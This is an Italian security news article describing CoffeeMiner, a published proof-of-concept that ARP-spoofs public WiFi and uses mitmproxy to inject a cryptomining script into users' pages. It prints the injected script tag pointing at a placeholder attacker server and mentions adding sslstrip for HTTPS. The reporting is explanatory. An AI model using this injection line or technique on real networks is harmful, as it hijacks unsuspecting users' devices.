Molti di voi avranno osservato l’inesorabile ascesa delle principali criptovalute, il Bitcoin su tutte. Questa impennata dei prezzi sta aumentando l’interesse dell’ecosistema criminale.
Aumentano i casi in cui criminali informatici sviluppano codici malevoli per rubare wallet contenenti criptovalute oppure hackerano siti web per installarvi script in grado di produrre monete virtuali (“mining”) sfruttando le risorse computazionali degli ignari visitatori.

Il progetto CoffeeMiner

Uno sviluppatore di nome Arnau ha pubblicato un interessante progetto denominato CoffeeMiner che dimostra come sia possibile hackerare una rete WiFi pubblica per iniettare codice per il mining di criptovalute all’interno delle sessioni degli utenti connessi. In questo modo un attaccante potrebbe sfruttare le risorse computazionali degli utenti connessi alla rete WiFi per produrre criptovalute.

L’idea del progetto è stata ispirata dal recente caso Starbucks in cui hacker hanno dirottato le connessioni dei laptop collegati alla rete WiFi per sfruttare la potenza di calcolo delle macchine in attività di mining.
Arnau ha spiegato come condurre una MITM (Man-In-The-Middle) per iniettare del codice javascript nelle pagine html richieste dagli utenti connessi alla rete WiFi, in questo modo tutti i dispositivi connessi ad una rete WiFi sono forzati ad effettuare calcoli per la produzione di criptovalute.
Il CoffeeMiner sfrutta la capacità di creare falsi pacchetti ARP (Address Resolution Protocol) su una rete locale per intercettare il traffico non criptato da altri dispositivi sulla rete.

Le modalità dell’attacco

L’attacco MiTM viene condotto utilizzando un software chiamato mitmproxy che consente di iniettare la seguente riga di codice HTML all’interno del traffico non crittografato relativo alle richieste effettuate dagli altri utenti connessi alla rete WI-FI:

<script src = “http: // httpserverIP: 8000 / script.js” type = “text / javascript”> </ script>

 

“Mitmproxy è uno strumento software che ci consente di analizzare il traffico che attraversa un host e di modificare quel traffico. Nel nostro caso, lo useremo per iniettare il javascript nelle pagine html “, ha scritto Arnau.

“Per rendere il processo più pulito, inseriremo solo una riga di codice nelle pagine html . E sarà quella linea di codice html che invocherà il minatore di criptovaluta javascript.”

 

Quando il browser dell’utente connesso alla rete WiFi carica una pagina, esegue anche il codice JavaScript iniettato che carica lo script minatore CoinHive per la generazione di criptovaluta Monero.

Arnau ha configurato una macchina VirtualBox per dimostrare l’attacco ed ha pubblicato un paio di video che dimostrano l’attacco rispettivamente in un ambiente virtualizzato ed in una rete reale.

 

 

La versione del progetto CoffeeMiner pubblicata dallo sviluppatore non funziona nel caso di connessioni HTTPS, ma la limitazione potrebbe essere facilmente aggirata con l’aggiunta di sslstrip che consente di forzare s’utilizzo del protocollo http su connessioni HTTPs.

 

 

“Un’altra caratteristica aggiuntiva potrebbe essere l’aggiunta di sslstrip , per garantire l’iniezione anche nei siti Web cui l’utente si connette tramite HTTPS.” Conclude lo sviluppatore. Per i più curiosi tra voi, Arnau ha pubblicato il codice del progetto CoffeeMiner su GitHub .